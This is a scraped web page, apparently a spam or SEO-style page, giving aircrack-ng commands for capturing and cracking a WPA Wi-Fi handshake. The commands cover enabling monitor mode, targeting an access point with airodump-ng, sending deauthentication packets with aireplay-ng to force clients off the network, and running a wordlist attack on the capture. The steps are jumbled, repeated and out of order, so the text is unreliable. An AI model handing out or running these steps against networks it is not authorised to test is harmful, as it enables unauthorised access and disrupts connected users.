aircrack-ng handshake

Aircrack-ng Handshake -

We are going to perform maintenance on Monday, March 9th 2026, starting at 7:00 am UTC. The website will be unavailable during this maintenance. More information.
  • Aircrack-ng Handshake -

    sudo airmon-ng start wlan0 The interface becomes wlan0mon . Use airodump-ng to discover nearby networks:

    sudo airmon-ng check kill Start monitor mode on the interface (e.g., wlan0): aircrack-ng handshake

    aircrack-ng -w wordlist.txt capture-01.cap sudo airmon-ng start wlan0 The interface becomes wlan0mon

    sudo aireplay-ng --deauth 5 -a <AP_MAC> wlan0mon This sends 5 deauth packets to broadcast, disconnecting connected clients. Upon reconnection, the 4-way handshake occurs. In the airodump-ng window, watch the top-right corner. When a handshake is captured, you’ll see: disconnecting connected clients. Upon reconnection

    sudo airmon-ng Kill interfering processes:

    sudo airodump-ng --bssid <AP_MAC> -c <channel> -w capture wlan0mon Replace <AP_MAC> and <channel> accordingly. The output files will begin with capture-01.cap . If no client is actively connecting, force reauthentication using aireplay-ng (deauthentication attack):

Don’t have an account yet? Register yourself now and be a part of our community!